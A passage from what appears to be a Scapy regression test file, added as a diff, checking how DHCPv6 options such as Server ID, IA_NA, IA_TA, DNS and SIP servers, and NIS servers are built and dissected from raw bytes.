+raw(DHCP6OptServerId(optlen=80, duid="somestring")) == b'\x00\x02\x00Psomestring' + += DHCP6OptServerId basic dissection +a=DHCP6OptServerId(b'\x00\x02\x00\x00') +a.optcode == 2 and a.optlen == 0 + += DHCP6OptServerId dissection with specific duid value +a=DHCP6OptServerId(b'\x00\x02\x00\x04somerawing') +a.optcode == 2 and a.optlen == 4 and isinstance(a.duid, Raw) and a.duid.load == b'some' and isinstance(a.payload, DHCP6OptUnknown) + += DHCP6OptServerId dissection with specific DUID_LL as duid value +a=DHCP6OptServerId(b'\x00\x02\x00\n\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00') +a.optcode == 2 and a.optlen == 10 and isinstance(a.duid, DUID_LL) and a.duid.type == 3 and a.duid.hwtype == 1 and a.duid.lladdr == "00:00:00:00:00:00" + += DHCP6OptServerId dissection with specific DUID_LLT as duid value +a=DHCP6OptServerId(b'\x00\x02\x00\x0e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.optcode == 2 and a.optlen == 14 and isinstance(a.duid, DUID_LLT) and a.duid.type == 1 and a.duid.hwtype == 1 and a.duid.timeval == 0 and a.duid.lladdr == "00:00:00:00:00:00" + += DHCP6OptServerId dissection with specific DUID_EN as duid value +a=DHCP6OptServerId(b'\x00\x02\x00\x06\x00\x02\x00\x00\x017') +a.optcode == 2 and a.optlen == 6 and isinstance(a.duid, DUID_EN) and a.duid.type == 2 and a.duid.enterprisenum == 311 and a.duid.id == b"" + + +############ +############ ++ Test DHCP6 IA Address Option (IA_TA or IA_NA suboption) + += DHCP6OptIAAddress - Basic Instantiation +raw(DHCP6OptIAAddress()) == b'\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += DHCP6OptIAAddress - Basic Dissection +a = DHCP6OptIAAddress(b'\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.optcode == 5 and a.optlen == 24 and a.addr == "::" and a.preflft == 0 and a. validlft == 0 and a.iaaddropts == [] + += DHCP6OptIAAddress - Instantiation with specific values +raw(DHCP6OptIAAddress(optlen=0x1111, addr="2222:3333::5555", preflft=0x66666666, validlft=0x77777777, iaaddropts="somestring")) == b'\x00\x05\x11\x11""33\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00UUffffwwwwsomestring' + += DHCP6OptIAAddress - Instantiation with specific values (default optlen computation) +raw(DHCP6OptIAAddress(addr="2222:3333::5555", preflft=0x66666666, validlft=0x77777777, iaaddropts="somestring")) == b'\x00\x05\x00"""33\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00UUffffwwwwsomestring' + += DHCP6OptIAAddress - Dissection with specific values +a = DHCP6OptIAAddress(b'\x00\x05\x00"""33\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00UUffffwwwwsomerawing') +a.optcode == 5 and a.optlen == 34 and a.addr == "2222:3333::5555" and a.preflft == 0x66666666 and a. validlft == 0x77777777 and a.iaaddropts[0].load == b"somerawing" + + +############ +############ ++ Test DHCP6 Identity Association for Non-temporary Addresses Option + += DHCP6OptIA_NA - Basic Instantiation +raw(DHCP6OptIA_NA()) == b'\x00\x03\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += DHCP6OptIA_NA - Basic Dissection +a = DHCP6OptIA_NA(b'\x00\x03\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.optcode == 3 and a.optlen == 12 and a.iaid == 0 and a.T1 == 0 and a.T2==0 and a.ianaopts == [] + += DHCP6OptIA_NA - Instantiation with specific values (keep automatic length computation) +raw(DHCP6OptIA_NA(iaid=0x22222222, T1=0x33333333, T2=0x44444444)) == b'\x00\x03\x00\x0c""""3333DDDD' + += DHCP6OptIA_NA - Instantiation with specific values (forced optlen) +raw(DHCP6OptIA_NA(optlen=0x1111, iaid=0x22222222, T1=0x33333333, T2=0x44444444)) == b'\x00\x03\x11\x11""""3333DDDD' + += DHCP6OptIA_NA - Instantiation with a list of IA Addresses (optlen automatic computation) +raw(DHCP6OptIA_NA(iaid=0x22222222, T1=0x33333333, T2=0x44444444, ianaopts=[DHCP6OptIAAddress(), DHCP6OptIAAddress()])) == b'\x00\x03\x00D""""3333DDDD\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += DHCP6OptIA_NA - Dissection with specific values +a = DHCP6OptIA_NA(b'\x00\x03\x00L""""3333DDDD\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.optcode == 3 and a.optlen == 76 and a.iaid == 0x22222222 and a.T1 == 0x33333333 and a.T2==0x44444444 and len(a.ianaopts) == 2 and isinstance(a.ianaopts[0], DHCP6OptIAAddress) and isinstance(a.ianaopts[1], DHCP6OptIAAddress) + += DHCP6OptIA_NA - Instantiation with a list of different opts: IA Address and Status Code (optlen automatic computation) +raw(DHCP6OptIA_NA(iaid=0x22222222, T1=0x33333333, T2=0x44444444, ianaopts=[DHCP6OptIAAddress(), DHCP6OptStatusCode(statuscode=0xff, statusmsg="Hello")])) == b'\x00\x03\x003""""3333DDDD\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x07\x00\xffHello' + + +############ +############ ++ Test DHCP6 Identity Association for Temporary Addresses Option + += DHCP6OptIA_TA - Basic Instantiation +raw(DHCP6OptIA_TA()) == b'\x00\x04\x00\x04\x00\x00\x00\x00' + += DHCP6OptIA_TA - Basic Dissection +a = DHCP6OptIA_TA(b'\x00\x04\x00\x04\x00\x00\x00\x00') +a.optcode == 4 and a.optlen == 4 and a.iaid == 0 and a.iataopts == [] + += DHCP6OptIA_TA - Instantiation with specific values +raw(DHCP6OptIA_TA(optlen=0x1111, iaid=0x22222222, iataopts=[DHCP6OptIAAddress(), DHCP6OptIAAddress()])) == b'\x00\x04\x11\x11""""\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += DHCP6OptIA_TA - Dissection with specific values +a = DHCP6OptIA_TA(b'\x00\x04\x11\x11""""\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.optcode == 4 and a.optlen == 0x1111 and a.iaid == 0x22222222 and len(a.iataopts) == 2 and isinstance(a.iataopts[0], DHCP6OptIAAddress) and isinstance(a.iataopts[1], DHCP6OptIAAddress) + += DHCP6OptIA_TA - Instantiation with a list of different opts: IA Address and Status Code (optlen automatic computation) +raw(DHCP6OptIA_TA(iaid=0x22222222, iataopts=[DHCP6OptIAAddress(), DHCP6OptStatusCode(statuscode=0xff, statusmsg="Hello")])) == b'\x00\x04\x00+""""\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x07\x00\xffHello' + + +############ +############ ++ Test DHCP6 Option Request Option + += DHCP6OptOptReq - Basic Instantiation +raw(DHCP6OptOptReq()) == b'\x00\x06\x00\x04\x00\x17\x00\x18' + += DHCP6OptOptReq - optlen field computation +raw(DHCP6OptOptReq(reqopts=[1,2,3,4])) == b'\x00\x06\x00\x08\x00\x01\x00\x02\x00\x03\x00\x04' + += DHCP6OptOptReq - instantiation with empty list +raw(DHCP6OptOptReq(reqopts=[])) == b'\x00\x06\x00\x00' + += DHCP6OptOptReq - Basic dissection +a=DHCP6OptOptReq(b'\x00\x06\x00\x00') +a.optcode == 6 and a.optlen == 0 and a.reqopts == [23,24] + += DHCP6OptOptReq - Dissection with specific value +a=DHCP6OptOptReq(b'\x00\x06\x00\x08\x00\x01\x00\x02\x00\x03\x00\x04') +a.optcode == 6 and a.optlen == 8 and a.reqopts == [1,2,3,4] + += DHCP6OptOptReq - repr +a.show() + + +############ +############ ++ Test DHCP6 Option - Preference option + += DHCP6OptPref - Basic instantiation +raw(DHCP6OptPref()) == b'\x00\x07\x00\x01\xff' + += DHCP6OptPref - Instantiation with specific values +raw(DHCP6OptPref(optlen=0xffff, prefval= 0x11)) == b'\x00\x07\xff\xff\x11' + += DHCP6OptPref - Basic Dissection +a=DHCP6OptPref(b'\x00\x07\x00\x01\xff') +a.optcode == 7 and a.optlen == 1 and a.prefval == 255 + += DHCP6OptPref - Dissection with specific values +a=DHCP6OptPref(b'\x00\x07\xff\xff\x11') +a.optcode == 7 and a.optlen == 0xffff and a.prefval == 0x11 + + +############ +############ ++ Test DHCP6 Option - Elapsed Time + += DHCP6OptElapsedTime - Basic Instantiation +raw(DHCP6OptElapsedTime()) == b'\x00\x08\x00\x02\x00\x00' + += DHCP6OptElapsedTime - Instantiation with specific elapsedtime value +raw(DHCP6OptElapsedTime(elapsedtime=421)) == b'\x00\x08\x00\x02\x01\xa5' + += DHCP6OptElapsedTime - Basic Dissection +a=DHCP6OptElapsedTime(b'\x00\x08\x00\x02\x00\x00') +a.optcode == 8 and a.optlen == 2 and a.elapsedtime == 0 + += DHCP6OptElapsedTime - Dissection with specific values +a=DHCP6OptElapsedTime(b'\x00\x08\x00\x02\x01\xa5') +a.optcode == 8 and a.optlen == 2 and a.elapsedtime == 421 + += DHCP6OptElapsedTime - Repr +a.show() + + +############ +############ ++ Test DHCP6 Option - Server Unicast Address + += DHCP6OptServerUnicast - Basic Instantiation +raw(DHCP6OptServerUnicast()) == b'\x00\x0c\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += DHCP6OptServerUnicast - Instantiation with specific values (test 1) +raw(DHCP6OptServerUnicast(srvaddr="2001::1")) == b'\x00\x0c\x00\x10 \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += DHCP6OptServerUnicast - Instantiation with specific values (test 2) +raw(DHCP6OptServerUnicast(srvaddr="2001::1", optlen=42)) == b'\x00\x0c\x00* \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += DHCP6OptServerUnicast - Dissection with default values +a=DHCP6OptServerUnicast(b'\x00\x0c\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.optcode == 12 and a.optlen == 16 and a.srvaddr == "::" + += DHCP6OptServerUnicast - Dissection with specific values (test 1) +a=DHCP6OptServerUnicast(b'\x00\x0c\x00\x10 \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +a.optcode == 12 and a.optlen == 16 and a.srvaddr == "2001::1" + += DHCP6OptServerUnicast - Dissection with specific values (test 2) +a=DHCP6OptServerUnicast(b'\x00\x0c\x00* \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +a.optcode == 12 and a.optlen == 42 and a.srvaddr == "2001::1" + + +############ +############ ++ Test DHCP6 Option - Status Code + += DHCP6OptStatusCode - Basic Instantiation +raw(DHCP6OptStatusCode()) == b'\x00\r\x00\x02\x00\x00' + += DHCP6OptStatusCode - Instantiation with specific values +raw(DHCP6OptStatusCode(optlen=42, statuscode=0xff, statusmsg="Hello")) == b'\x00\r\x00*\x00\xffHello' + += DHCP6OptStatusCode - Automatic Length computation +raw(DHCP6OptStatusCode(statuscode=0xff, statusmsg="Hello")) == b'\x00\r\x00\x07\x00\xffHello' + +# Add tests to verify Unicode behavior + + +############ +############ ++ Test DHCP6 Option - Rapid Commit + += DHCP6OptRapidCommit - Basic Instantiation +raw(DHCP6OptRapidCommit()) == b'\x00\x0e\x00\x00' + += DHCP6OptRapidCommit - Basic Dissection +a=DHCP6OptRapidCommit(b'\x00\x0e\x00\x00') +a.optcode == 14 and a.optlen == 0 + + +############ +############ ++ Test DHCP6 Option - User class + += DHCP6OptUserClass - Basic Instantiation +raw(DHCP6OptUserClass()) == b'\x00\x0f\x00\x00' + += DHCP6OptUserClass - Basic Dissection +a = DHCP6OptUserClass(b'\x00\x0f\x00\x00') +a.optcode == 15 and a.optlen == 0 and a.userclassdata == [] + += DHCP6OptUserClass - Instantiation with one user class data rawucture +raw(DHCP6OptUserClass(userclassdata=[USER_CLASS_DATA(data="something")])) == b'\x00\x0f\x00\x0b\x00\tsomething' + += DHCP6OptUserClass - Dissection with one user class data rawucture +a = DHCP6OptUserClass(b'\x00\x0f\x00\x0b\x00\tsomething') +a.optcode == 15 and a.optlen == 11 and len(a.userclassdata) == 1 and isinstance(a.userclassdata[0], USER_CLASS_DATA) and a.userclassdata[0].len == 9 and a.userclassdata[0].data == b'something' + += DHCP6OptUserClass - Instantiation with two user class data rawuctures +raw(DHCP6OptUserClass(userclassdata=[USER_CLASS_DATA(data="something"), USER_CLASS_DATA(data="somethingelse")])) == b'\x00\x0f\x00\x1a\x00\tsomething\x00\rsomethingelse' + += DHCP6OptUserClass - Dissection with two user class data rawuctures +a = DHCP6OptUserClass(b'\x00\x0f\x00\x1a\x00\tsomething\x00\rsomethingelse') +a.optcode == 15 and a.optlen == 26 and len(a.userclassdata) == 2 and isinstance(a.userclassdata[0], USER_CLASS_DATA) and isinstance(a.userclassdata[1], USER_CLASS_DATA) and a.userclassdata[0].len == 9 and a.userclassdata[0].data == b'something' and a.userclassdata[1].len == 13 and a.userclassdata[1].data == b'somethingelse' + + +############ +############ ++ Test DHCP6 Option - Vendor class + += DHCP6OptVendorClass - Basic Instantiation +raw(DHCP6OptVendorClass()) == b'\x00\x10\x00\x04\x00\x00\x00\x00' + += DHCP6OptVendorClass - Basic Dissection +a = DHCP6OptVendorClass(b'\x00\x10\x00\x04\x00\x00\x00\x00') +a.optcode == 16 and a.optlen == 4 and a.enterprisenum == 0 and a.vcdata == [] + += DHCP6OptVendorClass - Instantiation with one vendor class data rawucture +raw(DHCP6OptVendorClass(vcdata=[VENDOR_CLASS_DATA(data="something")])) == b'\x00\x10\x00\x0f\x00\x00\x00\x00\x00\tsomething' + += DHCP6OptVendorClass - Dissection with one vendor class data rawucture +a = DHCP6OptVendorClass(b'\x00\x10\x00\x0f\x00\x00\x00\x00\x00\tsomething') +a.optcode == 16 and a.optlen == 15 and a.enterprisenum == 0 and len(a.vcdata) == 1 and isinstance(a.vcdata[0], VENDOR_CLASS_DATA) and a.vcdata[0].len == 9 and a.vcdata[0].data == b'something' + += DHCP6OptVendorClass - Instantiation with two vendor class data rawuctures +raw(DHCP6OptVendorClass(vcdata=[VENDOR_CLASS_DATA(data="something"), VENDOR_CLASS_DATA(data="somethingelse")])) == b'\x00\x10\x00\x1e\x00\x00\x00\x00\x00\tsomething\x00\rsomethingelse' + += DHCP6OptVendorClass - Dissection with two vendor class data rawuctures +a = DHCP6OptVendorClass(b'\x00\x10\x00\x1e\x00\x00\x00\x00\x00\tsomething\x00\rsomethingelse') +a.optcode == 16 and a.optlen == 30 and a.enterprisenum == 0 and len(a.vcdata) == 2 and isinstance(a.vcdata[0], VENDOR_CLASS_DATA) and isinstance(a.vcdata[1], VENDOR_CLASS_DATA) and a.vcdata[0].len == 9 and a.vcdata[0].data == b'something' and a.vcdata[1].len == 13 and a.vcdata[1].data == b'somethingelse' + + +############ +############ ++ Test DHCP6 Option - Vendor-specific information + += DHCP6OptVendorSpecificInfo - Basic Instantiation +raw(DHCP6OptVendorSpecificInfo()) == b'\x00\x11\x00\x04\x00\x00\x00\x00' + += DHCP6OptVendorSpecificInfo - Basic Dissection +a = DHCP6OptVendorSpecificInfo(b'\x00\x11\x00\x04\x00\x00\x00\x00') +a.optcode == 17 and a.optlen == 4 and a.enterprisenum == 0 + += DHCP6OptVendorSpecificInfo - Instantiation with specific values (one option) +raw(DHCP6OptVendorSpecificInfo(enterprisenum=0xeeeeeeee, vso=[VENDOR_SPECIFIC_OPTION(optcode=43, optdata="something")])) == b'\x00\x11\x00\x11\xee\xee\xee\xee\x00+\x00\tsomething' + += DHCP6OptVendorSpecificInfo - Dissection with with specific values (one option) +a = DHCP6OptVendorSpecificInfo(b'\x00\x11\x00\x11\xee\xee\xee\xee\x00+\x00\tsomething') +a.optcode == 17 and a.optlen == 17 and a.enterprisenum == 0xeeeeeeee and len(a.vso) == 1 and isinstance(a.vso[0], VENDOR_SPECIFIC_OPTION) and a.vso[0].optlen == 9 and a.vso[0].optdata == b'something' + += DHCP6OptVendorSpecificInfo - Instantiation with specific values (two options) +raw(DHCP6OptVendorSpecificInfo(enterprisenum=0xeeeeeeee, vso=[VENDOR_SPECIFIC_OPTION(optcode=43, optdata="something"), VENDOR_SPECIFIC_OPTION(optcode=42, optdata="somethingelse")])) == b'\x00\x11\x00"\xee\xee\xee\xee\x00+\x00\tsomething\x00*\x00\rsomethingelse' + += DHCP6OptVendorSpecificInfo - Dissection with with specific values (two options) +a = DHCP6OptVendorSpecificInfo(b'\x00\x11\x00"\xee\xee\xee\xee\x00+\x00\tsomething\x00*\x00\rsomethingelse') +a.optcode == 17 and a.optlen == 34 and a.enterprisenum == 0xeeeeeeee and len(a.vso) == 2 and isinstance(a.vso[0], VENDOR_SPECIFIC_OPTION) and isinstance(a.vso[1], VENDOR_SPECIFIC_OPTION) and a.vso[0].optlen == 9 and a.vso[0].optdata == b'something' and a.vso[1].optlen == 13 and a.vso[1].optdata == b'somethingelse' + + +############ +############ ++ Test DHCP6 Option - Interface-Id + += DHCP6OptIfaceId - Basic Instantiation +raw(DHCP6OptIfaceId()) == b'\x00\x12\x00\x00' + += DHCP6OptIfaceId - Basic Dissection +a = DHCP6OptIfaceId(b'\x00\x12\x00\x00') +a.optcode == 18 and a.optlen == 0 + += DHCP6OptIfaceId - Instantiation with specific value +raw(DHCP6OptIfaceId(ifaceid="something")) == b'\x00\x12\x00\x09something' + += DHCP6OptIfaceId - Dissection with specific value +a = DHCP6OptIfaceId(b'\x00\x12\x00\x09something') +a.optcode == 18 and a.optlen == 9 and a.ifaceid == b"something" + + +############ +############ ++ Test DHCP6 Option - Reconfigure Message + += DHCP6OptReconfMsg - Basic Instantiation +raw(DHCP6OptReconfMsg()) == b'\x00\x13\x00\x01\x0b' + += DHCP6OptReconfMsg - Basic Dissection +a = DHCP6OptReconfMsg(b'\x00\x13\x00\x01\x0b') +a.optcode == 19 and a.optlen == 1 and a.msgtype == 11 + += DHCP6OptReconfMsg - Instantiation with specific values +raw(DHCP6OptReconfMsg(optlen=4, msgtype=5)) == b'\x00\x13\x00\x04\x05' + += DHCP6OptReconfMsg - Dissection with specific values +a = DHCP6OptReconfMsg(b'\x00\x13\x00\x04\x05') +a.optcode == 19 and a.optlen == 4 and a.msgtype == 5 + + +############ +############ ++ Test DHCP6 Option - Reconfigure Accept + += DHCP6OptReconfAccept - Basic Instantiation +raw(DHCP6OptReconfAccept()) == b'\x00\x14\x00\x00' + += DHCP6OptReconfAccept - Basic Dissection +a = DHCP6OptReconfAccept(b'\x00\x14\x00\x00') +a.optcode == 20 and a.optlen == 0 + += DHCP6OptReconfAccept - Instantiation with specific values +raw(DHCP6OptReconfAccept(optlen=23)) == b'\x00\x14\x00\x17' + += DHCP6OptReconfAccept - Dssection with specific values +a = DHCP6OptReconfAccept(b'\x00\x14\x00\x17') +a.optcode == 20 and a.optlen == 23 + + +############ +############ ++ Test DHCP6 Option - SIP Servers Domain Name List + += DHCP6OptSIPDomains - Basic Instantiation +raw(DHCP6OptSIPDomains()) == b'\x00\x15\x00\x00' + += DHCP6OptSIPDomains - Basic Dissection +a = DHCP6OptSIPDomains(b'\x00\x15\x00\x00') +a.optcode == 21 and a.optlen == 0 and a.sipdomains == [] + += DHCP6OptSIPDomains - Instantiation with one domain +raw(DHCP6OptSIPDomains(sipdomains=["toto.example.org"])) == b'\x00\x15\x00\x12\x04toto\x07example\x03org\x00' + += DHCP6OptSIPDomains - Dissection with one domain +a = DHCP6OptSIPDomains(b'\x00\x15\x00\x12\x04toto\x07example\x03org\x00') +a.optcode == 21 and a.optlen == 18 and len(a.sipdomains) == 1 and a.sipdomains[0] == "toto.example.org." + += DHCP6OptSIPDomains - Instantiation with two domains +raw(DHCP6OptSIPDomains(sipdomains=["toto.example.org", "titi.example.org"])) == b'\x00\x15\x00$\x04toto\x07example\x03org\x00\x04titi\x07example\x03org\x00' + += DHCP6OptSIPDomains - Dissection with two domains +a = DHCP6OptSIPDomains(b'\x00\x15\x00$\x04toto\x07example\x03org\x00\x04TITI\x07example\x03org\x00') +a.optcode == 21 and a.optlen == 36 and len(a.sipdomains) == 2 and a.sipdomains[0] == "toto.example.org." and a.sipdomains[1] == "TITI.example.org." + += DHCP6OptSIPDomains - Enforcing only one dot at end of domain +raw(DHCP6OptSIPDomains(sipdomains=["toto.example.org."])) == b'\x00\x15\x00\x12\x04toto\x07example\x03org\x00' + + +############ +############ ++ Test DHCP6 Option - SIP Servers IPv6 Address List + += DHCP6OptSIPServers - Basic Instantiation +raw(DHCP6OptSIPServers()) == b'\x00\x16\x00\x00' + += DHCP6OptSIPServers - Basic Dissection +a = DHCP6OptSIPServers(b'\x00\x16\x00\x00') +a.optcode == 22 and a. optlen == 0 and a.sipservers == [] + += DHCP6OptSIPServers - Instantiation with specific values (1 address) +raw(DHCP6OptSIPServers(sipservers = ["2001:db8::1"] )) == b'\x00\x16\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += DHCP6OptSIPServers - Dissection with specific values (1 address) +a = DHCP6OptSIPServers(b'\x00\x16\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +a.optcode == 22 and a.optlen == 16 and len(a.sipservers) == 1 and a.sipservers[0] == "2001:db8::1" + += DHCP6OptSIPServers - Instantiation with specific values (2 addresses) +raw(DHCP6OptSIPServers(sipservers = ["2001:db8::1", "2001:db8::2"] )) == b'\x00\x16\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' + += DHCP6OptSIPServers - Dissection with specific values (2 addresses) +a = DHCP6OptSIPServers(b'\x00\x16\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') +a.optcode == 22 and a.optlen == 32 and len(a.sipservers) == 2 and a.sipservers[0] == "2001:db8::1" and a.sipservers[1] == "2001:db8::2" + + +############ +############ ++ Test DHCP6 Option - DNS Recursive Name Server + += DHCP6OptDNSServers - Basic Instantiation +raw(DHCP6OptDNSServers()) == b'\x00\x17\x00\x00' + += DHCP6OptDNSServers - Basic Dissection +a = DHCP6OptDNSServers(b'\x00\x17\x00\x00') +a.optcode == 23 and a. optlen == 0 and a.dnsservers == [] + += DHCP6OptDNSServers - Instantiation with specific values (1 address) +raw(DHCP6OptDNSServers(dnsservers = ["2001:db8::1"] )) == b'\x00\x17\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += DHCP6OptDNSServers - Dissection with specific values (1 address) +a = DHCP6OptDNSServers(b'\x00\x17\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +a.optcode == 23 and a.optlen == 16 and len(a.dnsservers) == 1 and a.dnsservers[0] == "2001:db8::1" + += DHCP6OptDNSServers - Instantiation with specific values (2 addresses) +raw(DHCP6OptDNSServers(dnsservers = ["2001:db8::1", "2001:db8::2"] )) == b'\x00\x17\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' + += DHCP6OptDNSServers - Dissection with specific values (2 addresses) +a = DHCP6OptDNSServers(b'\x00\x17\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') +a.optcode == 23 and a.optlen == 32 and len(a.dnsservers) == 2 and a.dnsservers[0] == "2001:db8::1" and a.dnsservers[1] == "2001:db8::2" + + +############ +############ ++ Test DHCP6 Option - DNS Domain Search List Option + += DHCP6OptDNSDomains - Basic Instantiation +raw(DHCP6OptDNSDomains()) == b'\x00\x18\x00\x00' + += DHCP6OptDNSDomains - Basic Dissection +a = DHCP6OptDNSDomains(b'\x00\x18\x00\x00') +a.optcode == 24 and a.optlen == 0 and a.dnsdomains == [] + += DHCP6OptDNSDomains - Instantiation with specific values (1 domain) +raw(DHCP6OptDNSDomains(dnsdomains=["toto.example.com."])) == b'\x00\x18\x00\x12\x04toto\x07example\x03com\x00' + += DHCP6OptDNSDomains - Dissection with specific values (1 domain) +a = DHCP6OptDNSDomains(b'\x00\x18\x00\x12\x04toto\x07example\x03com\x00') +a.optcode == 24 and a.optlen == 18 and len(a.dnsdomains) == 1 and a.dnsdomains[0] == "toto.example.com." + += DHCP6OptDNSDomains - Instantiation with specific values (2 domains) +raw(DHCP6OptDNSDomains(dnsdomains=["toto.example.com.", "titi.example.com."])) == b'\x00\x18\x00$\x04toto\x07example\x03com\x00\x04titi\x07example\x03com\x00' + += DHCP6OptDNSDomains - Dissection with specific values (2 domains) +a = DHCP6OptDNSDomains(b'\x00\x18\x00$\x04toto\x07example\x03com\x00\x04titi\x07example\x03com\x00') +a.optcode == 24 and a.optlen == 36 and len(a.dnsdomains) == 2 and a.dnsdomains[0] == "toto.example.com." and a.dnsdomains[1] == "titi.example.com." + + +############ +############ ++ Test DHCP6 Option - IA_PD Prefix Option + += DHCP6OptIAPrefix - Basic Instantiation +raw(DHCP6OptIAPrefix()) == b'\x00\x1a\x00\x19\x00\x00\x00\x00\x00\x00\x00\x000 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + +#TODO : finish me + + +############ +############ ++ Test DHCP6 Option - Identity Association for Prefix Delegation + += DHCP6OptIA_PD - Basic Instantiation +raw(DHCP6OptIA_PD()) == b'\x00\x19\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += DHCP6OptIA_PD - Instantiation with a list of different opts: IA Address and Status Code (optlen automatic computation) +raw(DHCP6OptIA_PD(iaid=0x22222222, T1=0x33333333, T2=0x44444444, iapdopt=[DHCP6OptIAAddress(), DHCP6OptStatusCode(statuscode=0xff, statusmsg="Hello")])) == b'\x00\x19\x003""""3333DDDD\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x00\x07\x00\xffHello' + +#TODO : finish me + + +############ +############ ++ Test DHCP6 Option - NIS Servers + += DHCP6OptNISServers - Basic Instantiation +raw(DHCP6OptNISServers()) == b'\x00\x1b\x00\x00' + += DHCP6OptNISServers - Basic Dissection +a = DHCP6OptNISServers(b'\x00\x1b\x00\x00') +a.optcode == 27 and a. optlen == 0 and a.nisservers == [] + += DHCP6OptNISServers - Instantiation with specific values (1 address) +raw(DHCP6OptNISServers(nisservers = ["2001:db8::1"] )) == b'\x00\x1b\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' + += DHCP6OptNISServers - Dissection with specific values (1 address) +a = DHCP6OptNISServers(b'\x00\x1b\x00\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +a.optcode == 27 and a.optlen == 16 and len(a.nisservers) == 1 and a.nisservers[0] == "2001:db8::1" + += DHCP6OptNISServers - Instantiation with specific values (2 addresses) +raw(DHCP6OptNISServers(nisservers = ["2001:db8::1", "2001:db8::2"] )) == b'\x00\x1b\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' + += DHCP6OptNISServers - Dissection with specific values (2 addresses) +a = DHCP6OptNISServers(b'\x00\x1b\x00 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') +a.optcode == 27 and a.optlen == 32 and len(a.nisservers) == 2 and a.nisservers[0] == "2001:db8::1" and a.nisservers[1] == "2001:db8::2" + + +############ +############ ++ Test DHCP6 Option - NIS+ Servers + += DHCP6OptNISPServers - Basic Instantiation +raw(DHCP6OptNISPServers()) == b'\x00\x1c\x00\x00' + += 